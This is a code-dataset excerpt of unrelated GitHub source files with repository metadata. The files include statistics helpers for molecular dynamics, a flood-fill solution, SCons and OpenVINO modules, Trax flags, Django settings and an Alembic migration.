5774d3706ab207616029b0bacdc9d82ca94adb58 | ceead28beb1ea6cb56a2bb4472bc1d2396b39e6f | /gen_basis_helpers/analyse_md/std_stats.py | 2cc870c2ead0d8574f15f0ef23ac77a1b049285f | [] | no_license | RFogarty1/plato_gen_basis_helpers | 9df975d4198bff7bef80316527a8086b6819d8ab | 8469a51c1580b923ca35a56811e92c065b424d68 | refs/heads/master | 2022-06-02T11:01:37.759276 | 2022-05-11T12:57:40 | 2022-05-11T12:57:40 | 192,934,403 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py |
import math
def calcStandardErrorOfMeanForUncorrelatedData(stdDev, nSamples):
""" Gets the standard error of the mean (essentially the standard deviation of the mean value; used to estimate its error margins) assuming sampling points are uncorrelated
Standard.Error = stdDev / sqrt(nSamples)
Args:
stdDev: (float) The standard deviation of the sample points
nSamples: (int) The number of sample points used
Returns
standardError: (float)
"""
return stdDev/math.sqrt(nSamples)
def calcVarianceOfData(inpData, besselCorr=False):
""" Calculate the variance for a set of data
Args:
inpData: (iter of floats)
besselCorr: (Bool) If true we multiply by n/n-1 instead of n; this leads to an unbiased estimate
Returns
variance: (float) The variance of the input data
Raises:
Errors
"""
if besselCorr:
raise NotImplementedError("")
mean = sum(inpData)/len(inpData)
outVal = (1/len(inpData)) * sum([(x-mean)**2 for x in inpData])
return outVal
def getStatsFromBlockingDataUpToMaxOrder(inpData, maxOrder):
""" Divides data into blocks of blockSize and calculates mean (should be constant between blocksizes assuming not much trimmed) and standard error. This should help in estimating the standard error for the mean for a correlated data set (see e.g. https://doi.org/10.1063/1.457480 or 10.1002/jcc.20746)
Args:
inpData: (iter of floats)
maxOrder: (int) We divide each block into two for each order. So maxOrder=0 just gets stats for input data unmodified; maxOrder=1 includes data where we average each pair of data points; maxOrder=4 we average every 4 data points etc.
Returns
outDicts: (iter of dicts) Contains various info for each order. Some shown belowish
"""
outDicts = list()
currOrder = 0
currBlock = inpData
while currOrder <= maxOrder:
#Sort out this order
currVar = calcVarianceOfData(currBlock) / (len(currBlock)-1)
currStdDev = math.sqrt(currVar)
currStdDevError = currStdDev * (1 / math.sqrt( 2*(len(currBlock)-1) ))
currMean = sum(currBlock)/len(currBlock)
currDict = {"order":currOrder, "mean":currMean, "mean_std_dev":currStdDev, "mean_std_dev_std_dev":currStdDevError}
outDicts.append(currDict)
#Block the data
currBlock = _getDataDividedIntoTwoBlocks(currBlock)
#Break if we cant block data further
if len(currBlock) < 2:
break
currOrder += 1
return outDicts
def _getDataDividedIntoTwoBlocks(inpData):
outData = list()
idx = 0
while idx<len(inpData)-1:
outData.append( (inpData[idx]+inpData[idx+1])/2 )
idx += 2
return outData
#Moving averages: At time of writing these are effectively tested in analyse_thermo
def getSimpleMovingAverage(inpData):
""" Gets the moving average of inpData at each point
Args:
inpData: (iter of floats) The input data
Returns
movingAvg: (iter of floats). Each data point is sum(prevPoints)/len(prevPoints) [i.e. the moving average]
Raises:
Errors
"""
currSum = 0
outVals = list()
for idx,val in enumerate(inpData, start=1):
currSum += val
currVal = currSum / idx
outVals.append(currVal)
return outVals
def getCentralWindowAverageFromIter(inpIter, widthEachSide, fillValWhenNotCalc=None):
""" Gets a central-window moving average for the input data (each mean value is calculated from n values either side)
Args:
inpIter: (iter of Numbers) We take the moving averages of these numbers
widthEachSide: (int) Number of data points to take each side when calculating the mean
fillValWhenNotCalc: The value we output when we cant calculate a central moving average (e.g. we cant get a moving average for the first or last data points)
Returns
outVals: (iter of float) Central moving average. Each data point is an average of 2*widthEachSide + 1 data points
"""
stack = list()
outVals = list()
lenIter = len(inpIter)
reqStackSize = 2*widthEachSide + 1
#Initialise our stack
stack = [x for x in inpIter[:widthEachSide]]
#Calculate moving averages
for idx,val in enumerate(inpIter):
#Deal with the stack
if len(stack) == reqStackSize:
stack.pop(0)
if idx < lenIter-widthEachSide:
stack.append(inpIter[idx+widthEachSide])
#Calculate moving average
if len(stack) < reqStackSize:
outVals.append(fillValWhenNotCalc)
else:
outVals.append( sum(stack)/len(stack) )
return outVals
| [
"richard.m.fogarty@gmail.com"
] | richard.m.fogarty@gmail.com |
d66cd14a44c84ce857dbb8881ecff6b60762089f | 035963a845a82223094f06e5f844d43d03d1cd6a | /exercises/09_functions/task_9_1.py | 033227c9674ca06f63a9311e51eea75962719b91 | [] | no_license | antonRTJ/pyneng-examples-exercises | 6699ab6e44769be40c1542ffc81152c14b70889c | 4422d320f52f3096c14adb0dffcc0db1d317841d | refs/heads/master | 2021-05-05T21:40:08.543998 | 2017-12-23T14:57:09 | 2017-12-23T14:57:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,274 | py | # -*- coding: utf-8 -*-
'''
Задание 9.1
Создать функцию, которая генерирует конфигурацию для access-портов.
Параметр access ожидает, как аргумент, словарь access-портов, вида:
{ 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17,
'FastEthernet0/17':150 }
Функция должна возвращать список всех портов в режиме access
с конфигурацией на основе шаблона access_template.
Заготовка для функции уже сделана.
В конце строк в списке не должно быть символа перевода строки.
Пример итогового списка:
[
'interface FastEthernet0/12',
'switchport mode access',
'switchport access vlan 10',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable',
'interface FastEthernet0/17',
'switchport mode access',
'switchport access vlan 150',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable',
...]
Проверить работу функции на примере словаря access_dict.
Ограничение: Все задания надо выполнять используя только пройденные темы.
'''
def generate_access_config(access):
'''
access - словарь access-портов,
для которых необходимо сгенерировать конфигурацию, вида:
{ 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17}
Возвращает список всех портов в режиме access с конфигурацией на основе шаблона
'''
access_template = ['switchport mode access',
'switchport access vlan',
'switchport nonegotiate',
'spanning-tree portfast',
'spanning-tree bpduguard enable']
access_dict = { 'FastEthernet0/12':10,
'FastEthernet0/14':11,
'FastEthernet0/16':17,
'FastEthernet0/17':150 }
| [
"nataliya.samoylenko@gmail.com"
] | nataliya.samoylenko@gmail.com |
9e6026334732b244406c434e8fd565792db49317 | 2da8bcfb9a72e507812a8723e38ad6d030c300f1 | /flood_fill_733.py | 3369a85ae7338dc21c709986a4025add7e344ac1 | [] | no_license | aditya-doshatti/Leetcode | 1a4e0f391a7d6ca2d7f8fdc35e535f4ec10fb634 | eed20da07896db471ea6582785335e52d4f04f85 | refs/heads/master | 2023-04-06T02:18:57.287263 | 2023-03-17T03:08:42 | 2023-03-17T03:08:42 | 218,408,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,846 | py | '''
733. Flood Fill
Easy
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on. Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Example 1:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
https://leetcode.com/problems/flood-fill/
'''
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
if not image or len(image) == 0 : return 0
val = image[sr][sc]
if val == newColor:
return image
q = set({(sr,sc)})
while q:
curi, curj = q.pop()
image[curi][curj] = newColor
for i,j in ((-1,0), (0,-1), (0,1), (1,0)):
tempi ,tempj = curi + i, curj + j
if tempi >= 0 and tempi < len(image) and tempj >= 0 and tempj < len(image[tempi]):
if image[tempi][tempj] == val:
q.add((tempi, tempj))
return image
| [
"aditya.doshatti@sjsu.edu"
] | aditya.doshatti@sjsu.edu |
6d1783909b6899d68e06ba478dd41dfb7a7c831e | 72ce57d187fb6a4730f1390e280b939ef8087f5d | /nuitka/build/inline_copy/lib/scons-3.1.0/SCons/Tool/default.py | 866b823aa485784b0ff390b9219a74fe26efc8be | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | tommyli3318/Nuitka | c5b7681b73d96cb8859210ed1a78f09149a23825 | ae52b56024d53159a72a5acbfaac792ca207c418 | refs/heads/develop | 2020-05-02T17:02:10.578065 | 2019-10-27T15:53:32 | 2019-10-27T15:53:32 | 178,086,582 | 1 | 0 | Apache-2.0 | 2019-06-06T00:32:48 | 2019-03-27T22:53:31 | Python | UTF-8 | Python | false | false | 1,753 | py | """SCons.Tool.default
Initialization with a default tool list.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/default.py e724ae812eb96f4858a132f5b8c769724744faf6 2019-07-21 00:04:47 bdeegan"
import SCons.Tool
def generate(env):
"""Add default tools."""
for t in SCons.Tool.tool_list(env['PLATFORM'], env):
SCons.Tool.Tool(t)(env)
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| [
"kay.hayen@gmail.com"
] | kay.hayen@gmail.com |
e2d0a203ca2e2382431176af8da1ed0ab9efec5b | b18ff1d2a88cdad6d8ca73a8e6c34943f7bee055 | /toolcall/defaults.py | dd6bd85611e6c66052de01dc4bd15b7306bd76f2 | [
"MIT"
] | permissive | thebjorn/toolcall | 9c812d608a67990dfb04b4e8bc1ebfcd4e7440c3 | 2c1597c8224958b4751cfb09f7a1b4439ca6df09 | refs/heads/master | 2021-06-13T21:33:12.495795 | 2019-08-31T10:50:55 | 2019-08-31T10:50:55 | 147,824,176 | 0 | 0 | MIT | 2021-06-10T20:46:47 | 2018-09-07T13:02:31 | HTML | UTF-8 | Python | false | false | 884 | py | # -*- coding: utf-8 -*-
from django.conf import settings
def _get(attr, default=None):
return getattr(settings, attr, default)
if settings.DEBUG:
TOOLCALL_TOKEN_TIMEOUT_SECS = 200
else:
TOOLCALL_TOKEN_TIMEOUT_SECS = _get('TOOLCALL_TOKEN_TIMEOUT_SECS', 10)
TOOLCALL_TOKEN_SIZE = _get('TOOLCALL_TOKEN_SIZE', 51)
TOOLCALL_ERROR_RESTART_URL = _get('TOOLCALL_ERROR_RESTART_URL', "https://www.finaut.no/")
TOOLCALL_SERVICE_ROOT_URL = _get('TOOLCALL_SERVICE_ROOT_URL', "https://afr.norsktest.no/toolcall/")
TOOLCALL_START_URL = 'starturl'
TOOLCALL_STAGING_START_URL = 'starturl'
TOOLCALL_SUCCESS_URL = _get('TOOLCALL_SUCCESS_URL', "http://www.autorisasjonsordningen.no/profile/")
TOOLCALL_FAIL_URL = _get('TOOLCALL_FAIL_URL', "http://www.autorisasjonsordningen.no/profile/")
TOOLCALL_RENEW_TOKEN_URL = 'renew-token-url'
TOOLCALL_STAGING_RESULT_DATA = 'staging-result-data'
| [
"bp@datakortet.no"
] | bp@datakortet.no |
3d7613ea2ecad847eb249f75b64eded8a16d31ab | ad5b72656f0da99443003984c1e646cb6b3e67ea | /tools/mo/openvino/tools/mo/back/LinearToLinearONNXReplacer.py | 7c11672b5a3d3b1b997226463cc4bbc43fa7919e | [
"Apache-2.0"
] | permissive | novakale/openvino | 9dfc89f2bc7ee0c9b4d899b4086d262f9205c4ae | 544c1acd2be086c35e9f84a7b4359439515a0892 | refs/heads/master | 2022-12-31T08:04:48.124183 | 2022-12-16T09:05:34 | 2022-12-16T09:05:34 | 569,671,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.back.InterpolateReshape import InterpolateConcat, InterpolateReshapeWA
from openvino.tools.mo.back.replacement import BackReplacementPattern
from openvino.tools.mo.graph.graph import Graph
class LinearToLinearONNXReplacer(BackReplacementPattern):
"""
If we don't use this transformation, then we have a performance drop, because CPU and GPU have no optimized
version of the 'linear' mode of the operation Interpolate.
TODO: delete this transformation, when CPU and GPU will have optimized version of the 'linear' mode.
"""
enabled = True
def run_after(self):
return [InterpolateConcat, InterpolateReshapeWA]
def find_and_replace_pattern(self, graph: Graph):
for interpolate_node in graph.get_op_nodes(type='Interpolate', version='opset4', mode='linear'):
input_shape = interpolate_node.in_port(0).data.get_shape()
interpolate_name = interpolate_node.soft_get('name', interpolate_node.id)
assert input_shape is not None, \
'Shape of interpolated data for node {} must not be None'.format(interpolate_name)
input_rank = len(input_shape)
if input_rank == 4:
interpolate_node['mode'] = 'linear_onnx'
| [
"noreply@github.com"
] | novakale.noreply@github.com |
c7fcf71168896ce7ef086bfebc45389f64281412 | e63132f40675ca4f37af653952cac27649e5b548 | /trax/trainer_flags.py | 0ebb9edef726abfa30976eb25c44d82239609bdb | [
"Apache-2.0"
] | permissive | Dithn/trax | 9286b265741700e4e52044c50c01e01f70bf739e | c6513908602e934e5472f299851d84a53c8afcff | refs/heads/master | 2023-04-09T19:15:13.663285 | 2021-04-27T00:14:29 | 2021-04-27T00:15:41 | 234,445,011 | 0 | 0 | Apache-2.0 | 2021-04-27T11:37:58 | 2020-01-17T01:25:16 | Python | UTF-8 | Python | false | false | 3,647 | py | # coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Flags for trainer.py and rl_trainer.py.
We keep these flags in sync across the trainer and the rl_trainer binaries.
"""
from absl import flags
from absl import logging
# Common flags.
flags.DEFINE_string('output_dir',
None,
'Path to the directory to save logs and checkpoints.')
flags.DEFINE_multi_string('config_file',
None,
'Configuration file with parameters (.gin).')
flags.DEFINE_multi_string('config',
None,
'Configuration parameters (gin string).')
# TPU Flags
flags.DEFINE_bool('use_tpu', False, "Whether we're running on TPU.")
flags.DEFINE_string('jax_xla_backend',
'xla',
'Either "xla" for the XLA service directly, or "tpu_driver"'
'for a TPU Driver backend.')
flags.DEFINE_string('jax_backend_target',
'local',
'Either "local" or "rpc:address" to connect to a '
'remote service target.')
# trainer.py flags.
flags.DEFINE_string('dataset', None, 'Which dataset to use.')
flags.DEFINE_string('model', None, 'Which model to train.')
flags.DEFINE_string('data_dir', None, 'Path to the directory with data.')
flags.DEFINE_integer('log_level', logging.INFO, 'Log level.')
# TensorFlow Flags
flags.DEFINE_bool('enable_eager_execution',
True,
"Whether we're running TF in eager mode.")
flags.DEFINE_bool('tf_xla', True, 'Whether to turn on XLA for TF.')
flags.DEFINE_bool('tf_opt_pin_to_host',
False,
'Whether to turn on TF pin-to-host optimization.')
flags.DEFINE_bool('tf_opt_layout',
False,
'Whether to turn on TF layout optimization.')
flags.DEFINE_bool('tf_xla_forced_compile',
False,
'Use forced-compilation instead of auto-clustering for XLA.'
'This flag only has effects when --tf_xla is on.')
flags.DEFINE_bool('tf_allow_float64', False, 'Whether to allow float64 for TF.')
# rl_trainer.py flags.
flags.DEFINE_boolean('jax_debug_nans',
False,
'Setting to true will help to debug nans and disable jit.')
flags.DEFINE_boolean('disable_jit', False, 'Setting to true will disable jit.')
flags.DEFINE_string('envs_output_dir', '', 'Output dir for the envs.')
flags.DEFINE_bool('xm', False, 'Copy atari roms?')
flags.DEFINE_integer('train_batch_size',
32,
'Number of parallel environments during training.')
flags.DEFINE_integer('eval_batch_size', 4, 'Batch size for evaluation.')
flags.DEFINE_boolean('parallelize_envs',
False,
'If true, sets parallelism to number of cpu cores.')
flags.DEFINE_string('trajectory_dump_dir',
'',
'Directory to dump trajectories to.')
flags.DEFINE_bool('async_mode', False, 'Async mode.')
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
f627b1a808d5fa423185b2663584494a0ea59c6d | ff3830556ac86e9f92f8d85379bb8099cff014bd | /application/__init__.py | 5e1224c74053c1fc36922c5780c3dc33e58c72f0 | [] | no_license | tarvitz/test-work | f34153cd794842ea7b479d6b2b3226e65cd03feb | e35e0248cddcaf3d0a59ae7ad87883c146829809 | refs/heads/master | 2016-09-05T11:14:40.147068 | 2014-07-07T10:33:39 | 2014-07-07T10:33:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | # coding: utf-8
"""
Initialize Flask app
"""
from flask import Flask
app = Flask(__name__)
app.config.update({
'OBJECTS_ON_PAGE': 20
})
# Pull in URL dispatch routes
import urls | [
"tarvitz@blacklibrary.ru"
] | tarvitz@blacklibrary.ru |
72da1a452e300f4724452c7911137f4739eabc26 | 09d564aaab98f72dce6585e78a0642c9fe3539f4 | /python_xy/test.py | c6d52baf251d2a569af71a4aa24c5d7067ea144d | [] | no_license | everydayxy/xy_py | 4b983b4bccc843602f1ea0b1d5ea9576119604bf | 08b314e7ecb10e13394aa93b92084c53596834f3 | refs/heads/master | 2020-04-03T08:52:44.729729 | 2019-09-20T15:05:35 | 2019-09-20T15:05:35 | 134,683,779 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # #!/usr/bin/env python
# # coding:utf8
#
# f = open('xuqiu20181029.csv','r')
# new_dict = {}
# for line in f:
# parts = line.split('|')
# if int(parts[11]) == 2:
# if parts[2] in new_dict:
# new_dict[parts[2]] += int(parts[10])
# else:
# new_dict[parts[2]] = int(parts[10])
#
#
# for k,v in new_dict.items():
# if v > 6000:
# print(k,v)
# a = [[1, 2], [3, 4], [5, 6]]
# b = [x for l in a for x in l]
# print(b)
# a = [[1, 2], [3, 4], [5, 6]]
# flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
# print(flatten(a))
#
# def flatten(x):
# new_lst = []
# if type(x) is list:
# for l in x:
# for y in flatten(l):
# new_lst.append(y)
# else:
# new_lst = [x]
# return new_lst
# a = [[1, 2], [3, 4], [5, 6]]
# b = flatten(a)
# print(b)
a = 2222.123
print('{:.2f}'.format(a))
a = 'Henry'
print(f"{a}") | [
"everydayx@163.com"
] | everydayx@163.com |
d2429aa83f66ddc5d8393ba6fb8f875d920982e7 | e2eb7237ba115b18d9dde7fedf35f7c6387f6e2a | /wwp/migrations/versions/fe4855cc93a7_.py | dfa5c7cc5f68dd3b042aae08a83f19ee057836d3 | [] | no_license | dr-hemam/colp1 | 7854398958a43b4d5db708ff6b324c415c117eb2 | 7aab3587a9c4c4ec9442d92d26b175ae8f4fa40c | refs/heads/master | 2020-03-16T13:59:21.948476 | 2018-05-09T05:18:31 | 2018-05-09T05:18:31 | 132,704,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | """empty message
Revision ID: fe4855cc93a7
Revises: 9f00a5849e88
Create Date: 2017-06-09 09:00:03.546084
"""
# revision identifiers, used by Alembic.
revision = 'fe4855cc93a7'
down_revision = '9f00a5849e88'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('constraintanalysis_details', 'id',
existing_type=mysql.INTEGER(display_width=11),
nullable=True,
autoincrement=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('constraintanalysis_details', 'id',
existing_type=mysql.INTEGER(display_width=11),
nullable=False,
autoincrement=True)
# ### end Alembic commands ###
| [
"hassan.emam@hotmail.com"
] | hassan.emam@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.